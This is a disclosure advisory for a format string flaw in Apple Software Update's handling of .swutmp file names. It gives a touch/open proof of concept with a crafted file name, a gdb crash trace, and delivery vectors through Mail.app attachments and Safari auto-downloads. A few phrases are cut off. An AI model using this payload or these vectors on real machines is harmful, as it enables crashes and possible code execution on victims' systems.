Apple Software Update is used for delivering patches to end-users, such as the
Apple Security Update 2007-001. It relies on the HTTP protocol for retrieving
files associated with each available patch, and handles the
MIME type and the
swutmp file extensions.
Software Update fails to properly handle the filename strings containing the
swutmp extension. It's a affected by a typical format string
vulnerability, which can lead to a denial of service condition or arbitrary
See the 'Exploitation conditions' section for more information.
This issue has been verified with Apple Software Update Version 2.0.5 (2.0.5) on Mac OS X 10.4.8 (8L2127).
Proof of concept, exploit or instructions to reproduce
The following is the most simple way to demonstrate this issue:
$ touch %x.%x.%x.ThisIsEmbarrassing%x.%x.%x.%x.swutmp $ open %x.%x.%x.ThisIsEmbarrassing%x.%x.%x.%x.swutmp
See the 'Exploitation conditions' section for more information on different vectors to trigger the issue.
The following debugging information shows Software Update crashing when opening a file with a crafted filename:
(gdb) r Starting program: /System/Library/CoreServices/Software Update.app/Contents/ MacOS/Software Update Reading symbols for shared libraries ....... done Reading symbols for shared libraries . done Reading symbols for shared libraries . done Reading symbols for shared libraries . done Program received signal EXC_BAD_ACCESS, Could not access memory. Reason: KERN_PROTECTION_FAILURE at address: 0x9326aea3 0x9000c0c1 in __vfprintf () (gdb) i r eax 0x9326aea3 -1826181469 ecx 0x0 0 edx 0x0 0 ebx 0x9000ad62 -1879003806 esp 0xbfffd600 0xbfffd600 ebp 0xbfffdd58 0xbfffdd58 esi 0xbfffed4e -1073746610 edi 0x25 37 eip 0x9000c0c1 0x9000c0c1 <__vfprintf+4976> eflags 0x10282 66178 cs 0x17 23 ss 0x1f 31 ds 0x1f 31 es 0x1f 31 fs 0x0 0 gs 0x37 55 (gdb) back #0 0x9000c0c1 in __vfprintf () #1 0x90100ea9 in snprintf_l () #2 0x908119d5 in _CFStringAppendFormatAndArgumentsAux () #3 0x9081091c in _CFStringCreateWithFormatAndArgumentsAux () #4 0x925daa5d in -[NSPlaceholderString initWithFormat:locale:arguments:] () #5 0x925fc670 in -[NSString initWithFormat:arguments:] () #6 0x9336056f in -[NSAlert buildAlertStyle:title:message:first:second:third:oldStyle:args:] () #7 0x934ac77a in _NXDoLocalRunAlertPanel () #8 0x93588ad6 in NSRunCriticalAlertPanel () #9 0x0000612a in ?? () (gdb) grep /s ThisIsEmbarrassing Pattern found @ 0x1879433 0x1879433: "ThisIsEmbarrassing%n%n%n%#629AE" Pattern found @ 0x3b792b 0x3b792b: "ThisIsEmbarrassing%25n%25n%25n%25n%25n.swutmp??????\005" Pattern found @ 0x3b7c6b 0x3b7c6b: "ThisIsEmbarrassing%25n%25n%25n%25n%25n.swutmpssing%25`????\a\001" Pattern found @ 0x3b7cc4 0x3b7cc4: "ThisIsEmbarrassing%25n%25n%25n%25n%25n.swutmp"
We are conducting further tests around Software Update and possible
vectors to abuse this issue. So far, we have worked around Mail.app
via crafted attachment, 'pushing' Safari to download the file (which
is downloaded at the user Desktop folder automatically, by sending
it as the associated MIME type
and obviously locally opening the file.
There are other potential methods to abuse it and thus this advisory might be updated whenever new details become available and tested.
Workaround or temporary solution
Wait for Apple to release a patch for Software Update via Software Update.
"Ah, #23 explains #22 a little. It almost seems like they're wording it so a crash could lead to a root shell in all cases." -- Someone who missed Sesame street's "We Learn Reading with Duckie".